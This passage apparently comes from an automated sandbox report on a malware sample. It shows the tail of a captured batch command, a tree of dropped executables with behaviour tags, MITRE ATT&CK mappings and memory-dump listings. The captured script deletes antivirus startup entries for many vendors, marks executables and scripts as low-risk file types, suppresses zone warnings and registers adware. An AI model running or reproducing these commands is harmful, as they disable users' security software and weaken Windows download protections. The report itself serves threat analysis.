"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AvastUI.exe" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "QHSafeTray" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Zillya Antivirus" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBAMTray" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBRegRebootCleaner" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "egui" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "IseUI" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "COMODO Internet Security" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "ClamWin" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Avira SystrayStartTrigger" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AVGUI.exe" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f Reg Delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f ) else ( Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "DefaultFileTypeRisk" /t REG_DWORD /d "24914" /f /reg:64 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "LowRiskFileTypes" /t REG_SZ /d ".zip;.rar;.nfo;.txt;.exe;.bat;.com;.cmd;.reg;.msi;.htm;.html;.gif;.bmp;.jpg;.avi;.mpg;.mpeg;.mov;.mp3;.m3u;.wav;" /f /reg:64 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "HideZoneInfoOnProperties" /t REG_DWORD /d "1" /f /reg:64 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "SaveZoneInformation" /t REG_DWORD /d "2" /f /reg:64 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "DisplayName" /t REG_SZ /d "RelevantKnowledge" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "UninstallString" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlvknlg.exe -bootremove -uninst:RelevantKnowledge" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK_Path" /t REG_SZ /d "%windir%\system32\rlls.dll" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK64_Path" /t REG_SZ /d "%windir%\system32\rlls64.dll" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "LD64_Path" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlvknlg64.exe" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "KS_Path" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlls.dll" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "SV_Path" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlservice.exe" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy" /v "" /t REG_SZ /d "" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RunLine" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlvknlg.exe -boot" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "ServiceName" /t REG_SZ /d "RelevantKnowledge" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "UninstURL" /t REG_SZ /d "http://www.relevantknowledge.com/confirmuninstall.aspx?siteid=2600&campaign_id=794" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RevertPath" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AvastUI.exe" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "QHSafeTray" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Zillya Antivirus" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBAMTray" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBRegRebootCleaner" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "egui" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "IseUI" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "COMODO Internet Security" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "ClamWin" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Avira SystrayStartTrigger" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AVGUI.exe" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:32 Reg Delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AvastUI.exe" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "QHSafeTray" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Zillya Antivirus" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBAMTray" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBRegRebootCleaner" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "egui" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "IseUI" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "COMODO Internet Security" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "ClamWin" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Avira SystrayStartTrigger" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AVGUI.exe" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:64 Reg Delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:64 )
      4⤵
      PID:3400

C:\Users\Admin\AppData\Local\Temp\4577.exe
C:\Users\Admin\AppData\Local\Temp\4577.exe
1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1332
- C:\Windows\SysWOW64\cmd.exe
  cmd /Q /C C:\Users\Admin\AppData\Local\Temp/s.bat
  2⤵
  - Drops startup file
  PID:1788

C:\Users\Admin\AppData\Local\Temp\470E.exe
C:\Users\Admin\AppData\Local\Temp\470E.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2684
- C:\Users\Admin\AppData\Local\Temp\470E.exe
  C:\Users\Admin\AppData\Local\Temp\470E.exe
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  PID:1488
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 1488 -s 1460
    3⤵
    - Program crash
    - Suspicious use of AdjustPrivilegeToken
    PID:4064

C:\Users\Admin\AppData\Local\Temp\4E53.exe
C:\Users\Admin\AppData\Local\Temp\4E53.exe
1⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
PID:3880

C:\Users\Admin\AppData\Local\Temp\A5F9.exe
C:\Users\Admin\AppData\Local\Temp\A5F9.exe
1⤵
- Executes dropped EXE
PID:2224
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 2224 -s 736
  2⤵
  - Program crash
  - Suspicious use of AdjustPrivilegeToken
  PID:4028
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 2224 -s 720
  2⤵
  - Program crash
  - Suspicious use of AdjustPrivilegeToken
  PID:3888
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 2224 -s 848
  2⤵
  - Program crash
  - Suspicious use of AdjustPrivilegeToken
  PID:1524
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 2224 -s 884
  2⤵
  - Program crash
  - Suspicious use of AdjustPrivilegeToken
  PID:1416
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 2224 -s 852
  2⤵
  - Suspicious use of NtCreateProcessExOtherParentProcess
  - Program crash
  - Suspicious use of AdjustPrivilegeToken
  PID:3600

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:3240

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:3812

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:2120

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:3896

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:4068

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:2372

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:2464

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:2108

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:416

C:\Users\Admin\AppData\Roaming\wgsbiwi
C:\Users\Admin\AppData\Roaming\wgsbiwi
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:204
- C:\Users\Admin\AppData\Roaming\wgsbiwi
  C:\Users\Admin\AppData\Roaming\wgsbiwi
  2⤵
  - Executes dropped EXE
  - Checks SCSI registry key(s)
  PID:3548

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Disabling Security Tools

T1089

Modify Registry

T1112

Virtualization/Sandbox Evasion

T1497

Credential Access

Credentials in Files

T1081

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Virtualization/Sandbox Evasion

T1497

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/416-358-0x0000000000340000-0x0000000000349000-memory.dmp

Filesize
36KB

Download
memory/416-357-0x0000000000350000-0x0000000000355000-memory.dmp

Filesize
20KB

Download
memory/648-114-0x0000000000030000-0x000000000003A000-memory.dmp

Filesize
40KB

Download
memory/688-126-0x0000000002C80000-0x0000000002D2E000-memory.dmp

Filesize
696KB

Download
memory/688-129-0x0000000000400000-0x0000000002C7C000-memory.dmp

Filesize
40.5MB

Download
memory/856-156-0x0000000004870000-0x00000000048AB000-memory.dmp

Filesize
236KB

Download
memory/856-158-0x0000000000400000-0x0000000002C7C000-memory.dmp

Filesize
40.5MB

Download
memory/1332-155-0x0000000000400000-0x0000000002D86000-memory.dmp

Filesize
41.5MB

Download
memory/1332-153-0x00000000054D0000-0x00000000056E1000-memory.dmp

Filesize
2.1MB

Download
memory/1332-139-0x0000000003420000-0x0000000003663000-memory.dmp

Filesize
2.3MB

Download
memory/1332-142-0x0000000000400000-0x0000000002D86000-memory.dmp

Filesize
41.5MB

Download
memory/1488-212-0x0000000000400000-0x0000000000495000-memory.dmp

Filesize
596KB

Download
memory/1488-194-0x0000000000400000-0x0000000000495000-memory.dmp

Filesize
596KB

Download
memory/2080-283-0x0000000006FC3000-0x0000000006FC4000-memory.dmp

Filesize
4KB

Download
memory/2080-251-0x0000000006FC0000-0x0000000006FC1000-memory.dmp

Filesize
4KB

Download
memory/2080-252-0x0000000006FC2000-0x0000000006FC3000-memory.dmp

Filesize
4KB

Download
memory/2080-266-0x00000000093F0000-0x0000000009423000-memory.dmp

Filesize
204KB

Download
memory/2080-280-0x000000007EF20000-0x000000007EF21000-memory.dmp

Filesize
4KB

Download
memory/2108-331-0x0000000000D60000-0x0000000000D65000-memory.dmp

Filesize
20KB

Download
memory/2108-333-0x0000000000D50000-0x0000000000D59000-memory.dmp

Filesize
36KB

Download
memory/2120-233-0x0000000000A30000-0x0000000000A37000-memory.dmp

Filesize
28KB

Download
memory/2120-234-0x0000000000A20000-0x0000000000A2B000-memory.dmp

Filesize
44KB

Download
memory/2224-226-0x0000000004830000-0x00000000048C1000-memory.dmp

Filesize
580KB

Download
memory/2224-222-0x0000000000400000-0x0000000002CA9000-memory.dmp

Filesize
40.7MB

Download
memory/2372-262-0x0000000000A10000-0x0000000000A16000-memory.dmp

Filesize
24KB

Download
memory/2372-264-0x0000000000A00000-0x0000000000A0C000-memory.dmp

Filesize
48KB

Download
memory/2428-117-0x0000000000440000-0x0000000000456000-memory.dmp

Filesize
88KB

Download
memory/2464-282-0x0000000000F90000-0x0000000000F99000-memory.dmp

Filesize
36KB

Download
memory/2464-281-0x0000000000FA0000-0x0000000000FA4000-memory.dmp

Filesize
16KB

Download
memory/2684-146-0x0000000004CC0000-0x0000000004CC1000-memory.dmp

Filesize
4KB

Download
memory/2684-135-0x0000000004D10000-0x0000000004D11000-memory.dmp

Filesize
4KB

Download
memory/2684-128-0x0000000000320000-0x0000000000321000-memory.dmp

Filesize
4KB

Download
memory/2684-192-0x0000000004F00000-0x0000000004F21000-memory.dmp

Filesize
132KB

Download
memory/2684-141-0x0000000004C70000-0x000000000516E000-memory.dmp

Filesize
5.0MB

Download
memory/2684-131-0x0000000005170000-0x0000000005171000-memory.dmp

Filesize
4KB

Download
memory/3240-219-0x0000000000700000-0x0000000000774000-memory.dmp

Filesize
464KB

Download
memory/3240-223-0x0000000000690000-0x00000000006FB000-memory.dmp

Filesize
428KB

Download
memory/3584-115-0x0000000000400000-0x0000000000409000-memory.dmp

Filesize
36KB

Download
memory/3728-185-0x0000000009630000-0x0000000009631000-memory.dmp

Filesize
4KB

Download
memory/3728-184-0x0000000009980000-0x0000000009981000-memory.dmp

Filesize
4KB

Download
memory/3728-170-0x0000000008240000-0x0000000008241000-memory.dmp

Filesize
4KB

Download
memory/3728-169-0x00000000080D0000-0x00000000080D1000-memory.dmp

Filesize
4KB

Download
memory/3728-167-0x0000000004EB2000-0x0000000004EB3000-memory.dmp

Filesize
4KB

Download
memory/3728-176-0x0000000008190000-0x0000000008191000-memory.dmp

Filesize
4KB

Download
memory/3728-166-0x0000000004EB0000-0x0000000004EB1000-memory.dmp

Filesize
4KB

Download
memory/3728-165-0x0000000007880000-0x0000000007881000-memory.dmp

Filesize
4KB

Download
memory/3728-172-0x00000000082B0000-0x00000000082B1000-memory.dmp

Filesize
4KB

Download
memory/3728-164-0x0000000004EC0000-0x0000000004EC1000-memory.dmp

Filesize
4KB

Download
memory/3728-191-0x0000000004EB3000-0x0000000004EB4000-memory.dmp

Filesize
4KB

Download
memory/3728-186-0x00000000096A0000-0x00000000096A1000-memory.dmp

Filesize
4KB

Download
memory/3812-224-0x0000000000F70000-0x0000000000F77000-memory.dmp

Filesize
28KB

Download
memory/3812-225-0x0000000000F60000-0x0000000000F6C000-memory.dmp

Filesize
48KB

Download
memory/3860-236-0x0000000009360000-0x00000000094BB000-memory.dmp

Filesize
1.4MB

Download
memory/3860-232-0x0000000006B33000-0x0000000006B34000-memory.dmp

Filesize
4KB

Download
memory/3860-229-0x00000000097F0000-0x00000000097F1000-memory.dmp

Filesize
4KB

Download
memory/3860-205-0x0000000007A90000-0x0000000007A91000-memory.dmp

Filesize
4KB

Download
memory/3860-213-0x0000000006B30000-0x0000000006B31000-memory.dmp

Filesize
4KB

Download
memory/3860-214-0x0000000006B32000-0x0000000006B33000-memory.dmp

Filesize
4KB

Download
memory/3880-163-0x0000000006C60000-0x0000000006C61000-memory.dmp

Filesize
4KB

Download
memory/3880-160-0x0000000006560000-0x0000000006561000-memory.dmp

Filesize
4KB

Download
memory/3880-168-0x00000000067E0000-0x00000000067E1000-memory.dmp

Filesize
4KB

Download
memory/3880-137-0x0000000001280000-0x0000000001281000-memory.dmp

Filesize
4KB

Download
memory/3880-178-0x0000000006B30000-0x0000000006B31000-memory.dmp

Filesize
4KB

Download
memory/3880-140-0x00000000779F0000-0x0000000077B7E000-memory.dmp

Filesize
1.6MB

Download
memory/3880-143-0x0000000005670000-0x0000000005671000-memory.dmp

Filesize
4KB

Download
memory/3880-144-0x00000000050D0000-0x00000000050D1000-memory.dmp

Filesize
4KB

Download
memory/3880-173-0x00000000069E0000-0x00000000069E1000-memory.dmp

Filesize
4KB

Download
memory/3880-145-0x0000000005130000-0x0000000005131000-memory.dmp

Filesize
4KB

Download
memory/3880-149-0x0000000005320000-0x0000000005321000-memory.dmp

Filesize
4KB

Download
memory/3880-148-0x0000000005050000-0x0000000005051000-memory.dmp

Filesize
4KB

Download
memory/3880-147-0x0000000005170000-0x0000000005171000-memory.dmp

Filesize
4KB

Download
memory/3896-237-0x0000000000F00000-0x0000000000F09000-memory.dmp

Filesize
36KB

Download
memory/3896-238-0x0000000000EF0000-0x0000000000EFF000-memory.dmp

Filesize
60KB

Download
memory/4068-254-0x0000000000D80000-0x0000000000D85000-memory.dmp

Filesize
20KB

Download
memory/4068-255-0x0000000000D70000-0x0000000000D79000-memory.dmp

Filesize
36KB

Download